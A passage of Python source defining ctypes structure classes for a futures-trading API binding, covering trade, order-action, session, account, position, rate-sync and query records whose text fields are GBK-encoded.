        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, BranchID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("ExchangeID", ExchangeID),
            ("OrderSysID", OrderSysID),
            ("ActionFlag", ActionFlag),
            ("ActionDate", ActionDate),
            ("ActionTime", ActionTime),
            ("TraderID", TraderID),
            ("OrderLocalID", OrderLocalID),
            ("ActionLocalID", ActionLocalID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("BusinessUnit", BusinessUnit),
            ("OrderActionStatus", OrderActionStatus),
            ("UserID", UserID),
            ("BranchID", BranchID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("LimitPrice", LimitPrice),
            ("VolumeChange", VolumeChange),
            ("InstallID", InstallID),
        ):
            if value:
                setattr(self, name, value)
class ExchangeOrderActionError(Struct):
    """Exchange-side order-action error record (ctypes struct)."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, ExchangeID=None, OrderSysID=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ErrorID=None, ErrorMsg=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        numeric = {"InstallID", "ErrorID"}  # c_int fields, stored unencoded
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value if field in numeric else value.encode("GBK"))
class ExchangeTrade(Struct):
    """Exchange-side trade (fill) record, backed by a ctypes struct."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("TradeID", c_char_Array_21),
        ("Direction", c_char),
        ("OrderSysID", c_char_Array_21),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("TradingRole", c_char),
        ("ExchangeInstID", c_char_Array_31),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("Price", c_double),
        ("Volume", c_int),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("TradeType", c_char),
        ("PriceSource", c_char),
        ("TraderID", c_char_Array_21),
        ("OrderLocalID", c_char_Array_13),
        ("ClearingPartID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("SequenceNo", c_int),
        ("TradeSource", c_char),
    ]
    def __init__(self, ExchangeID=None, TradeID=None, Direction=None, OrderSysID=None, ParticipantID=None, ClientID=None, TradingRole=None, ExchangeInstID=None, OffsetFlag=None, HedgeFlag=None, Price=None, Volume=None, TradeDate=None, TradeTime=None, TradeType=None, PriceSource=None, TraderID=None, OrderLocalID=None, ClearingPartID=None, BusinessUnit=None, SequenceNo=None, TradeSource=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        numeric = {"Price", "Volume", "SequenceNo"}  # c_double/c_int, stored unencoded
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value if field in numeric else value.encode("GBK"))
class Trade(Struct):
    """Broker-side trade (fill) record, backed by a ctypes struct."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("ExchangeID", c_char_Array_9),
        ("TradeID", c_char_Array_21),
        ("Direction", c_char),
        ("OrderSysID", c_char_Array_21),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("TradingRole", c_char),
        ("ExchangeInstID", c_char_Array_31),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("Price", c_double),
        ("Volume", c_int),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("TradeType", c_char),
        ("PriceSource", c_char),
        ("TraderID", c_char_Array_21),
        ("OrderLocalID", c_char_Array_13),
        ("ClearingPartID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("SequenceNo", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("BrokerOrderSeq", c_int),
        ("TradeSource", c_char),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, ExchangeID=None, TradeID=None, Direction=None, OrderSysID=None, ParticipantID=None, ClientID=None, TradingRole=None, ExchangeInstID=None, OffsetFlag=None, HedgeFlag=None, Price=None, Volume=None, TradeDate=None, TradeTime=None, TradeType=None, PriceSource=None, TraderID=None, OrderLocalID=None, ClearingPartID=None, BusinessUnit=None, SequenceNo=None, TradingDay=None, SettlementID=None, BrokerOrderSeq=None, TradeSource=None, InvestUnitID=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        # c_double/c_int fields, stored unencoded; everything else is a char array.
        numeric = {"Price", "Volume", "SequenceNo", "SettlementID", "BrokerOrderSeq"}
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value if field in numeric else value.encode("GBK"))
class UserSession(Struct):
    """Logged-in user session record (front/session ids plus login metadata)."""
    _fields_ = [
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("LoginDate", c_char_Array_9),
        ("LoginTime", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("UserProductInfo", c_char_Array_11),
        ("InterfaceProductInfo", c_char_Array_11),
        ("ProtocolInfo", c_char_Array_11),
        ("MacAddress", c_char_Array_21),
        ("LoginRemark", c_char_Array_36),
    ]
    def __init__(self, FrontID=None, SessionID=None, BrokerID=None, UserID=None, LoginDate=None, LoginTime=None, IPAddress=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, LoginRemark=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        numeric = {"FrontID", "SessionID"}  # c_int fields, stored unencoded
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value if field in numeric else value.encode("GBK"))
class QueryMaxOrderVolume(Struct):
    """Query record for the maximum permitted order volume (ctypes struct)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("Direction", c_char),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("MaxVolume", c_int),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, Direction=None, OffsetFlag=None, HedgeFlag=None, MaxVolume=None, ExchangeID=None, InvestUnitID=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                # MaxVolume is the lone c_int; all other fields are char arrays.
                setattr(self, field, value if field == "MaxVolume" else value.encode("GBK"))
class SettlementInfoConfirm(Struct):
    """Settlement-information confirmation record (ctypes struct)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ConfirmDate", c_char_Array_9),
        ("ConfirmTime", c_char_Array_9),
        ("SettlementID", c_int),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ConfirmDate=None, ConfirmTime=None, SettlementID=None, AccountID=None, CurrencyID=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                # SettlementID is the lone c_int; all other fields are char arrays.
                setattr(self, field, value if field == "SettlementID" else value.encode("GBK"))
class SyncDeposit(Struct):
    """Deposit synchronisation record (ctypes struct)."""
    _fields_ = [
        ("DepositSeqNo", c_char_Array_15),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("Deposit", c_double),
        ("IsForce", c_int),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, DepositSeqNo=None, BrokerID=None, InvestorID=None, Deposit=None, IsForce=None, CurrencyID=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        numeric = {"Deposit", "IsForce"}  # c_double/c_int, stored unencoded
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value if field in numeric else value.encode("GBK"))
class SyncFundMortgage(Struct):
    """Fund-mortgage synchronisation record (ctypes struct)."""
    _fields_ = [
        ("MortgageSeqNo", c_char_Array_15),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("FromCurrencyID", c_char_Array_4),
        ("MortgageAmount", c_double),
        ("ToCurrencyID", c_char_Array_4),
    ]
    def __init__(self, MortgageSeqNo=None, BrokerID=None, InvestorID=None, FromCurrencyID=None, MortgageAmount=None, ToCurrencyID=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                # MortgageAmount is the lone c_double; all other fields are char arrays.
                setattr(self, field, value if field == "MortgageAmount" else value.encode("GBK"))
class BrokerSync(Struct):
    """Broker synchronisation request: carries only the broker identifier."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
    ]
    def __init__(self, BrokerID=None):
        """Store *BrokerID* (GBK-encoded) when a truthy value is supplied."""
        super().__init__()
        for field, text in (("BrokerID", BrokerID),):
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class SyncingInvestor(Struct):
    """Investor record used during data synchronisation (ctypes struct)."""
    _fields_ = [
        ("InvestorID", c_char_Array_13),
        ("BrokerID", c_char_Array_11),
        ("InvestorGroupID", c_char_Array_13),
        ("InvestorName", c_char_Array_81),
        ("IdentifiedCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("IsActive", c_int),
        ("Telephone", c_char_Array_41),
        ("Address", c_char_Array_101),
        ("OpenDate", c_char_Array_9),
        ("Mobile", c_char_Array_41),
        ("CommModelID", c_char_Array_13),
        ("MarginModelID", c_char_Array_13),
    ]
    def __init__(self, InvestorID=None, BrokerID=None, InvestorGroupID=None, InvestorName=None, IdentifiedCardType=None, IdentifiedCardNo=None, IsActive=None, Telephone=None, Address=None, OpenDate=None, Mobile=None, CommModelID=None, MarginModelID=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                # IsActive is the lone c_int; all other fields are char arrays.
                setattr(self, field, value if field == "IsActive" else value.encode("GBK"))
class SyncingTradingCode(Struct):
    """Trading-code record used during data synchronisation (ctypes struct)."""
    _fields_ = [
        ("InvestorID", c_char_Array_13),
        ("BrokerID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("ClientID", c_char_Array_11),
        ("IsActive", c_int),
        ("ClientIDType", c_char),
    ]
    def __init__(self, InvestorID=None, BrokerID=None, ExchangeID=None, ClientID=None, IsActive=None, ClientIDType=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                # IsActive is the lone c_int; all other fields are char arrays.
                setattr(self, field, value if field == "IsActive" else value.encode("GBK"))
class SyncingInvestorGroup(Struct):
    """Investor-group record used during data synchronisation; all fields are text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorGroupID", c_char_Array_13),
        ("InvestorGroupName", c_char_Array_41),
    ]
    def __init__(self, BrokerID=None, InvestorGroupID=None, InvestorGroupName=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, text in supplied.items():
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class SyncingTradingAccount(Struct):
    """Trading-account record used during data synchronisation.

    Almost every field is a numeric balance/margin figure (c_double/c_int);
    only the four fields listed in ``gbk`` below are GBK-encoded text.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("PreMortgage", c_double),
        ("PreCredit", c_double),
        ("PreDeposit", c_double),
        ("PreBalance", c_double),
        ("PreMargin", c_double),
        ("InterestBase", c_double),
        ("Interest", c_double),
        ("Deposit", c_double),
        ("Withdraw", c_double),
        ("FrozenMargin", c_double),
        ("FrozenCash", c_double),
        ("FrozenCommission", c_double),
        ("CurrMargin", c_double),
        ("CashIn", c_double),
        ("Commission", c_double),
        ("CloseProfit", c_double),
        ("PositionProfit", c_double),
        ("Balance", c_double),
        ("Available", c_double),
        ("WithdrawQuota", c_double),
        ("Reserve", c_double),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("Credit", c_double),
        ("Mortgage", c_double),
        ("ExchangeMargin", c_double),
        ("DeliveryMargin", c_double),
        ("ExchangeDeliveryMargin", c_double),
        ("ReserveBalance", c_double),
        ("CurrencyID", c_char_Array_4),
        ("PreFundMortgageIn", c_double),
        ("PreFundMortgageOut", c_double),
        ("FundMortgageIn", c_double),
        ("FundMortgageOut", c_double),
        ("FundMortgageAvailable", c_double),
        ("MortgageableFund", c_double),
        ("SpecProductMargin", c_double),
        ("SpecProductFrozenMargin", c_double),
        ("SpecProductCommission", c_double),
        ("SpecProductFrozenCommission", c_double),
        ("SpecProductPositionProfit", c_double),
        ("SpecProductCloseProfit", c_double),
        ("SpecProductPositionProfitByAlg", c_double),
        ("SpecProductExchangeMargin", c_double),
        ("FrozenSwap", c_double),
        ("RemainSwap", c_double),
    ]
    def __init__(self, BrokerID=None, AccountID=None, PreMortgage=None, PreCredit=None, PreDeposit=None, PreBalance=None, PreMargin=None, InterestBase=None, Interest=None, Deposit=None, Withdraw=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CurrMargin=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, Balance=None, Available=None, WithdrawQuota=None, Reserve=None, TradingDay=None, SettlementID=None, Credit=None, Mortgage=None, ExchangeMargin=None, DeliveryMargin=None, ExchangeDeliveryMargin=None, ReserveBalance=None, CurrencyID=None, PreFundMortgageIn=None, PreFundMortgageOut=None, FundMortgageIn=None, FundMortgageOut=None, FundMortgageAvailable=None, MortgageableFund=None, SpecProductMargin=None, SpecProductFrozenMargin=None, SpecProductCommission=None, SpecProductFrozenCommission=None, SpecProductPositionProfit=None, SpecProductCloseProfit=None, SpecProductPositionProfitByAlg=None, SpecProductExchangeMargin=None, FrozenSwap=None, RemainSwap=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        gbk = {"BrokerID", "AccountID", "TradingDay", "CurrencyID"}  # char-array fields
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value.encode("GBK") if field in gbk else value)
class SyncingInvestorPosition(Struct):
    """Investor-position record used during data synchronisation.

    Most fields are numeric position/P&L figures (c_int/c_double); only the
    fields listed in ``gbk`` below are GBK-encoded text.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("PosiDirection", c_char),
        ("HedgeFlag", c_char),
        ("PositionDate", c_char),
        ("YdPosition", c_int),
        ("Position", c_int),
        ("LongFrozen", c_int),
        ("ShortFrozen", c_int),
        ("LongFrozenAmount", c_double),
        ("ShortFrozenAmount", c_double),
        ("OpenVolume", c_int),
        ("CloseVolume", c_int),
        ("OpenAmount", c_double),
        ("CloseAmount", c_double),
        ("PositionCost", c_double),
        ("PreMargin", c_double),
        ("UseMargin", c_double),
        ("FrozenMargin", c_double),
        ("FrozenCash", c_double),
        ("FrozenCommission", c_double),
        ("CashIn", c_double),
        ("Commission", c_double),
        ("CloseProfit", c_double),
        ("PositionProfit", c_double),
        ("PreSettlementPrice", c_double),
        ("SettlementPrice", c_double),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OpenCost", c_double),
        ("ExchangeMargin", c_double),
        ("CombPosition", c_int),
        ("CombLongFrozen", c_int),
        ("CombShortFrozen", c_int),
        ("CloseProfitByDate", c_double),
        ("CloseProfitByTrade", c_double),
        ("TodayPosition", c_int),
        ("MarginRateByMoney", c_double),
        ("MarginRateByVolume", c_double),
        ("StrikeFrozen", c_int),
        ("StrikeFrozenAmount", c_double),
        ("AbandonFrozen", c_int),
        ("ExchangeID", c_char_Array_9),
        ("YdStrikeFrozen", c_int),
        ("InvestUnitID", c_char_Array_17),
        ("PositionCostOffset", c_double),
    ]
    def __init__(self, InstrumentID=None, BrokerID=None, InvestorID=None, PosiDirection=None, HedgeFlag=None, PositionDate=None, YdPosition=None, Position=None, LongFrozen=None, ShortFrozen=None, LongFrozenAmount=None, ShortFrozenAmount=None, OpenVolume=None, CloseVolume=None, OpenAmount=None, CloseAmount=None, PositionCost=None, PreMargin=None, UseMargin=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, PreSettlementPrice=None, SettlementPrice=None, TradingDay=None, SettlementID=None, OpenCost=None, ExchangeMargin=None, CombPosition=None, CombLongFrozen=None, CombShortFrozen=None, CloseProfitByDate=None, CloseProfitByTrade=None, TodayPosition=None, MarginRateByMoney=None, MarginRateByVolume=None, StrikeFrozen=None, StrikeFrozenAmount=None, AbandonFrozen=None, ExchangeID=None, YdStrikeFrozen=None, InvestUnitID=None, PositionCostOffset=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        # Char/char-array fields that carry GBK text; every other field is numeric.
        gbk = {"InstrumentID", "BrokerID", "InvestorID", "PosiDirection", "HedgeFlag",
               "PositionDate", "TradingDay", "ExchangeID", "InvestUnitID"}
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value.encode("GBK") if field in gbk else value)
class SyncingInstrumentMarginRate(Struct):
    """Instrument margin-rate record used during data synchronisation (ctypes struct)."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("HedgeFlag", c_char),
        ("LongMarginRatioByMoney", c_double),
        ("LongMarginRatioByVolume", c_double),
        ("ShortMarginRatioByMoney", c_double),
        ("ShortMarginRatioByVolume", c_double),
        ("IsRelative", c_int),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, IsRelative=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        gbk = {"InstrumentID", "InvestorRange", "BrokerID", "InvestorID", "HedgeFlag"}
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value.encode("GBK") if field in gbk else value)
class SyncingInstrumentCommissionRate(Struct):
    """Instrument commission-rate record used during data synchronisation (ctypes struct)."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OpenRatioByMoney", c_double),
        ("OpenRatioByVolume", c_double),
        ("CloseRatioByMoney", c_double),
        ("CloseRatioByVolume", c_double),
        ("CloseTodayRatioByMoney", c_double),
        ("CloseTodayRatioByVolume", c_double),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None):
        """Populate only the truthy keyword arguments; text values are GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        gbk = {"InstrumentID", "InvestorRange", "BrokerID", "InvestorID"}
        for field, value in supplied.items():
            if value:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, value.encode("GBK") if field in gbk else value)
class SyncingInstrumentTradingRight(Struct):
    """Instrument trading-right record used during data synchronisation; all fields are text."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("TradingRight", c_char),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, TradingRight=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, text in supplied.items():
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class QryOrder(Struct):
    """Order-query request record (ctypes struct); all fields are text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("InsertTimeStart", c_char_Array_9),
        ("InsertTimeEnd", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, OrderSysID=None, InsertTimeStart=None, InsertTimeEnd=None, InvestUnitID=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, text in supplied.items():
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class QryTrade(Struct):
    """Trade-query request record (ctypes struct); all fields are text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("TradeID", c_char_Array_21),
        ("TradeTimeStart", c_char_Array_9),
        ("TradeTimeEnd", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, TradeID=None, TradeTimeStart=None, TradeTimeEnd=None, InvestUnitID=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, text in supplied.items():
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class QryInvestorPosition(Struct):
    """Investor-position query request record (ctypes struct); all fields are text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, text in supplied.items():
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class QryTradingAccount(Struct):
    """Trading-account query request record (ctypes struct); all fields are text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("BizType", c_char),
        ("AccountID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, CurrencyID=None, BizType=None, AccountID=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        supplied = dict(locals())
        supplied.pop("self")
        super().__init__()
        for field, text in supplied.items():
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class QryInvestor(Struct):
    """Investor query request record (ctypes struct); both fields are text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        """Populate only the truthy keyword arguments; every value is GBK-encoded."""
        super().__init__()
        for field, text in (("BrokerID", BrokerID), ("InvestorID", InvestorID)):
            if text:  # falsy values keep the zero-initialised ctypes default
                setattr(self, field, text.encode("GBK"))
class QryTradingCode(Struct):
    """Trading-code query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ClientID", c_char_Array_11),
        ("ClientIDType", c_char),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None, ClientID=None, ClientIDType=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
            ("ClientID", ClientID),
            ("ClientIDType", ClientIDType),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryInvestorGroup(Struct):
    """Investor-group query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
    ]

    def __init__(self, BrokerID=None):
        super().__init__()
        # GBK-encode a non-empty broker ID; otherwise keep the ctypes zero default.
        if BrokerID:
            setattr(self, "BrokerID", BrokerID.encode("GBK"))
class QryInstrumentMarginRate(Struct):
    """Instrument margin-rate query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, HedgeFlag=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryInstrumentCommissionRate(Struct):
    """Instrument commission-rate query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryInstrumentTradingRight(Struct):
    """Instrument trading-right query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QryBroker(Struct):
    """Broker query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
    ]

    def __init__(self, BrokerID=None):
        super().__init__()
        # GBK-encode a non-empty broker ID; otherwise keep the ctypes zero default.
        if BrokerID:
            setattr(self, "BrokerID", BrokerID.encode("GBK"))
class QryTrader(Struct):
    """Trader query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None):
        super().__init__()
        # GBK-encode non-empty string arguments; unset ones keep the ctypes zero default.
        for field, value in (
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("TraderID", TraderID),
        ):
            if value:
                setattr(self, field, value.encode("GBK"))
class QrySuperUserFunction(Struct):
    """Super-user function query filter; string fields are stored GBK-encoded."""
    _fields_ = [
        ("UserID", c_char_Array_16),
    ]

    def __init__(self, UserID=None):
        super().__init__()
